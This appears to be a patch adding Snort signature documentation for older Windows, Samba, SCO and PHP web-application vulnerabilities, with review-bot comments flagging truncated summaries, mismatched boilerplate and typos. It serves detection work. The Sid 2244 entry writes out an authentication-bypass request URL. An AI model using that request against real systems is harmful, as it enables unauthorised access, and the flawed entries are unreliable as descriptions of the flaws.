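Review bot: False Positives "None Known" is wrong for this rule: access to C$ is routine for administrators, login scripts and management tools, so legitimate administrative traffic will fire this event; say so and tell the analyst to check the source against known admin hosts. Corrective Action only mentions tcp port 139, but SMB is also carried directly over tcp port 445 (the 3422 document in this same patch lists 135, 139 and 445); blocking 139 alone leaves the share reachable. Impact says "Possible administrator access to the host", whereas Detailed Information notes that C$ already requires administrative rights; the event is better described as use of credentials that are already administrative, whether or not they belong to the person using them.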
--- /dev/null
+++ b/doc/signatures/3118.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3118
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
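Review bot: Affected Systems lists "Microsoft Windows Server 2000", which is not a product name; the Windows 2000 line should read "Microsoft Windows 2000 Server" (the 3422 document in this patch lists it simply as "Windows 2000"). Detailed Information should also identify the protocol and port the service listens on so the analyst knows what traffic the rule inspects. There is a stray blank line between the "-- " separator and "Corrective Action:", and several separators carry trailing spaces; normalise them. Additional References is empty; the vendor bulletin should be cited.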
--- /dev/null
+++ b/doc/signatures/1739.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1739
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
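Review bot: Affected Systems is empty and the Summary never identifies the web server or application whose authentication mechanism the rule targets; the "validating the credentials of a client host" paragraph is shared with several other files in this patch and gives the analyst nothing specific. Name the product and URI matched by the rule, otherwise this document adds nothing over the rule message. Typo: "ona web server" should be "on a web server".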
--- /dev/null
+++ b/doc/signatures/706.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+
+706
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a 
+vulnerability in Microsoft SQL Server and Data Engine.
+
+--
+Impact:
+Serious. Full system compromise is possible.
+
+--
+Detailed Information:
+A buffer overflow condition in the xp_peekqueue variable exists which 
+may allow the execution of an arbitary command with administrative 
+priviledge.
+
+The vulnerability occurs in API Srv_paraminfo(), which is implemented by
+Extended Stored Procedures (XPs) in Microsoft SQL Server and Data 
+Engine. It may also be possible for attackers to execute arbitrary code 
+on the host running SQL Server. 
+
+
+--
+Affected Systems:
+
+ Microsoft SQL Server 7.0
+ Microsoft SQL Server 2000 
+ Microsoft Data Engine 1.0
+ Microsoft Data Engine 2000 
+  
+
+--
+Attack Scenarios:
+
+An attacker can pass an overly long string to the XP xp_peekqueue,
+a buffer overflow can occur due to an unsafe memory copy. This can cause
+SQL Server to crash.
+
+
+--
+Ease of Attack:
+
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+
+None known
+
+--
+False Negatives:
+
+None known
+
+--
+Corrective Action:
+ 
+Apply the appropriate vendor supplied patch
+(Microsoft Patch Q280380 , Microsoft Patch Q280380)
+
+--
+Contributors:
+Original Rule Writer Unknown
+Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2040/
+--
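Review bot: Corrective Action lists the same patch twice, "(Microsoft Patch Q280380 , Microsoft Patch Q280380)"; either drop the duplicate or give the second patch its real identifier, and remove the stray space before the comma. Detailed Information also has typos ("arbitary", "priviledge") and calls xp_peekqueue a "variable" while the next paragraph correctly describes it as an extended stored procedure (XP). Impact says "Full system compromise is possible" but Attack Scenarios ends with "This can cause SQL Server to crash", so the scenario should also mention the code execution outcome; the sentence "An attacker can pass an overly long string to the XP xp_peekqueue, a buffer overflow can occur" is a comma splice. Finally, the blank line between "Sid:" and "706" and the contributor format "(tony@ksc.net, tonie@thai.com)" differ from the angle-bracket convention used by the other files.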
--- /dev/null
+++ b/doc/signatures/463.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+463
+
+--
+
+Summary:
+This event is generated when an ICMP Type 7 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 7 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 7 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 7 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
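Review bot: The Impact section ("ICMP Type 7 datagrams are not currently used by any known devices.") describes the protocol status rather than an impact on the monitored host; move that sentence into Detailed Information and state what such traffic may indicate, since Detailed Information only says it "should be investigated" without saying why. Also the "--" separators after False Negatives and Corrective Action lack the preceding blank line used everywhere else in this file, and the "None known" entries lack the trailing period used in the other files.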
--- /dev/null
+++ b/doc/signatures/3036.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3036
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
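Review bot: Detailed Information has "heterogenous" for "heterogeneous" and a missing space in "remote server.The problem". Additional References is empty although Affected Systems pins the issue to "Samba 3.0.8 and prior"; a vendor advisory or Bugtraq/CVE link would let readers confirm which release fixed it, since Corrective Action only says "Apply the appropriate vendor supplied patch" without naming one. Several separators in this file are "-- " with a trailing space; trim them for consistency.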
--- /dev/null
+++ b/doc/signatures/2988.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2988
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the Windows
+registry service via SMB. 
+
+--
+Impact:
+Serious. Remote administration of the Windows reqistry may be possible.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to bind to the Windows
+registry service via SMB across the network.
+
+It may be possible for an attacker to manipulate the Windows registry
+from a remote location. This could give the attacker administrative
+privileges on the target host as well as the opportunity to execute code
+of their choosing.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If the Windows registry is accessible via SMB the attacker can
+manipulate the operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
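Review bot: Impact has a typo, "Windows reqistry". Affected Systems ("Microsoft Windows systems.") is very broad; if the rule only matters for hosts that expose the remote registry service over SMB, say so, since the Corrective Action entry "Disallow remote registry manipulation." implies that is the precondition. "None Known." under False Negatives should be "None known." to match False Positives.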
--- /dev/null
+++ b/doc/signatures/100000601.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000601
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_markunpaid.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"inv_markunpaid.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
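Review bot: The third paragraph of Detailed Information and the whole Attack Scenarios section are the generic CGI authentication boilerplate ("access an authentication mechanism and supply his/her own credentials"), which does not describe a remote file include through the "admin_template_path" parameter; they should explain that a remote URL supplied in that parameter is fetched and executed by the "inv_markunpaid.php" script. Also fix "ona web server" (for "on a web server"), "attackers choosing" (for "attacker's choosing"), and the redundant "exploitation attempt has been attempted". The "--" separators after the Sid, Affected Systems and Contributors sections are missing the preceding blank line used elsewhere in this file, and Additional References is empty.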
--- /dev/null
+++ b/doc/signatures/100000717.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000717
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "configuration.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "configuration.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
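Review bot: As with the Indexu entries, the Attack Scenarios section and the third Detailed Information paragraph describe credential weaknesses rather than a remote file include through the "phpraid_dir" parameter of "configuration.php"; replace them with a description of the parameter being used to load a remote file. Fix "ona web server" and "attackers choosing", drop the two leading blank lines at the top of the file, and add the preceding blank line before the "--" separators that follow Sid, Affected Systems and Contributors. Additional References is empty.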
--- /dev/null
+++ b/doc/signatures/2066.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2066
+
+--
+Summary:
+file on a Lotus Domino Server.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Certain versions of Lotus Domino web servers do not correctly handle 
+requests for script files not specific to Lotus Domino.
+
+By using a dot in the filename an attacker may view the source of the 
+script and be presented with sensitive information embedded in the 
+script.
+
+--
+Affected Systems:
+Lotus Domino Server 5.0 and 6.0
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP request for the script and add
+a dot to the filename. This can be done using a browser.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6841
+
+--
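Review bot: The Summary is truncated: "file on a Lotus Domino Server." is the tail of a sentence whose beginning is missing, so the entry never states what the event is generated for; restore the opening (Detailed Information indicates it concerns a request for a script file with a dot appended to the filename). "Ease of Attack: Simple" lacks the period used in the other files.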
--- /dev/null
+++ b/doc/signatures/2000.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2000
+
+--
+Summary:
+This event is generated when a remote user attempts to access readmsg.php on a web server. This may indicate an attempt to exploit a directory traversal vulnerability in the WebMail application on Sun Microsystems' Cobalt Qube 3.0 server appliance.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in the WebMail application used by Sun Microsystems' Cobalt Qube 3.0 server appliance. An attacker can use directory traversal techniques when accessing readmsg.php to view hidden files and directories on the web server with the access privileges of the server. 
+
+--
+Affected Systems:
+Any Cobalt Qube 3.0 server appliance running Cobalt Qube Webmail 2.0.1.
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques when executing readmsg.php to view directories and files on the Cobalt server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses readmsg.php, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the newest version of the software. Sun Microsystems has released a patch (Qube3-ml-Security-2.0.1-10626.pkg) that can be downloaded from ftp://ftp.cobalt.com/. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2987
+
+CVE
+http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CAN-2001-1408
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11073
+
+--
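Review bot: The CVE link uses a keyword search ("cvekey.cgi?keyword=CAN-2001-1408") rather than the direct entry form "cvename.cgi?name=..." used elsewhere in this patch; the direct form is stable and cannot return multiple results. Otherwise this entry is a good model for the others: False Positives names the legitimate access that triggers the rule and Corrective Action names the specific patch package.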
--- /dev/null
+++ b/doc/signatures/304.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 304
+
+--
+Summary:
+This event is genereated when an attempt to overflow the buffer of a SCO server is attempted.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host or execute arbitrary code with the privileges of the superuser account.
+
+--
+Detailed Information:
+Some versions of SCO UNIX Calserver are vulnerable to a buffer overflow condition which can present the attacker with a root shell.
+
+Affected Systems:
+	SCO Internet faststart 1.0, 1.1
+	SCO Open Server 5.0, 5.0.2, 5.0.3 and 5.0.4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0306
+
+Bugtraq:
+http://www.securityfocus.com/bid/2353
+
+--
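Review bot: Detailed Information is not closed by a "--" separator before "Affected Systems:", unlike every other section in this patch. Typos: "genereated", "compromize"; "SCO Internet faststart" should use the product's capitalization (FastStart). "Sid: 304" is on one line whereas all other files put the number on its own line. Attack Scenarios ("Exploit scripts are available") duplicates Ease of Attack and is not a scenario; it should describe the overlong request to the calserver service that Detailed Information refers to. The Summary is also redundant ("an attempt to overflow ... is attempted").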
--- /dev/null
+++ b/doc/signatures/1516.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1516
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
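Review bot: "ona web server" should be "on a web server" and "attackers choosing" should be "attacker's choosing" (twice). The line "relationships between the victim server and other hosts can be exploited by the attacker." exceeds the wrap width used by the rest of the paragraph. Affected Systems ("All systems running CGI applications") together with an empty Additional References makes the entry hard to act on; if the rule targets a specific CGI script, name it in Summary and Affected Systems.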
--- /dev/null
+++ b/doc/signatures/100000777.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000777
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "action.php" with SQL commands being passed as the "action" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "action" parameter in the "action.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
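Review bot: The third paragraph of Detailed Information is the CGI credential-check boilerplate and does not describe SQL injection through the "action" parameter of "action.php"; drop it, since the preceding paragraph already gives the database-specific consequences. The second paragraph is a run-on ("...compromise the database backend for the application, the attacker may also be able..."); split it into two sentences. Also fix "ona web server" and "attackers choosing". Given that Attack Scenarios attributes the issue to input that is "not correctly sanitized or checked before passing that input to the database", Corrective Action could add input validation and parameterized queries alongside patching, which is what the linked "SQL Injection Attack and Defense" reference covers.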
--- /dev/null
+++ b/doc/signatures/2244.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2244
+
+--
+Summary:
+This event is generated when an attempt is made to 
+
+--
+Impact:
+Serious. Unauthorized access.
+
+--
+Detailed Information:
+Certain versions of Lucent VitalNet allow access to resources without
+the need for a password.
+
+--
+Affected Systems:
+	Lucent VitalAnalysis 8.0, 8.1, 8.2
+	Lucent VitalEvent 8.0, 8.1, 8.2
+	Lucent VitalHelp 8.0, 8.1, 8.2
+	Lucent VitalNet 8.0, 8.1, 8.2
+	Lucent VitalSuite 8.0, 8.1, 8.2
+
+--
+Attack Scenarios:
+The attacker merely needs to guess a valid username and can gain access
+without the need for a password.
+
+http://victim.foo.com/cgi-bin/VsSetCookie.exe?vsuser=username
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
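Review bot: The Summary is truncated: "This event is generated when an attempt is made to " ends mid-sentence, so the entry never says what is detected; complete it from Detailed Information (access to Lucent VitalNet resources without a password via VsSetCookie.exe). Detailed Information mentions only VitalNet while Affected Systems also lists VitalAnalysis, VitalEvent, VitalHelp and VitalSuite; the description should cover the whole suite or explain the relationship. "Rule:  " has trailing spaces. Additional References is empty; since Corrective Action says to upgrade, a vendor advisory naming the fixed version would help.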
--- /dev/null
+++ b/doc/signatures/3406.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3406
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
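Review bot: "Expoit" under Ease of Attack should be "Exploit". Additional References is empty for a vulnerability that has vendor bulletins; add the Microsoft bulletin and Bugtraq/CVE links so the "appropriate vendor supplied patches" in Corrective Action can be identified. The port-blocking advice ("135, 139 and 445 for both TCP and UDP") is a sound containment step and is worth keeping as written.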
--- /dev/null
+++ b/doc/signatures/100000107.txt
@@ -0,0 +1,90 @@
+Rule: 
+
+--
+Sid: 
+100000107
+
+-- 
+Summary: 
+This event is generated when an SQL injection attempt is made against the 
+Microsoft BizTalk Server DTA Interface.
+
+-- 
+
+Impact: 
+Attackers may retreive or modify sensitive in formation stored in the affected 
+database. Additionally, attackers may use the database's functionality to 
+execute arbitrary commands on the system with the priviliges of the user 
+running the script, typically Administrator.
+
+--
+Detailed Information:
+This rule looks specifically for attacks against the RawCustomSearchField.asp 
+module of the DTA Interface which contain the string "exec", which is required 
+to run commands on the host system. Thus, this rule does not detect generic SQL 
+injection attempts, only command execution attempts.
+
+--
+Affected Systems:
+Microsoft BizTalk Server 2000 Developer Edition SP2
+Microsoft BizTalk Server 2000 Developer Edition SP1a
+Microsoft BizTalk Server 2000 Developer Edition
+Microsoft BizTalk Server 2000 Enterprise Edition SP2
+Microsoft BizTalk Server 2000 Enterprise Edition SP1a
+Microsoft BizTalk Server 2000 Enterprise Edition
+Microsoft BizTalk Server 2000 Standard Edition SP2
+Microsoft BizTalk Server 2000 Standard Edition SP1a
+Microsoft BizTalk Server 2000 Standard Edition
+Microsoft BizTalk Server 2002 Developer Edition
+Microsoft BizTalk Server 2002 Enterprise Edition
+
+--
+
+Attack Scenarios: 
+A web browser or a script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as example attacks that can be used with a web browser are publicly 
+available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Patches which correct this problem are available from Microsoft.com.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+Microsoft BizTalk Server 2000 Enterprise Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+Microsoft BizTalk Server 2000 Developer Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+Microsoft BizTalk Server 2000 Standard Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+
+Microsoft BizTalk Server 2002 Enterprise Edition: 
+http://microsoft.com/downloads/details.aspx?FamilyId=A05344FE-2622-4887-AA45-3DE
+7C4ED3C75&displaylang=en
+
+Microsoft BizTalk Server 2002 Developer Edition: 
+http://microsoft.com/downloads/details.aspx?FamilyId=A05344FE-2622-4887-AA45-3DE
+7C4ED3C75&displaylang=en
+
+-- 
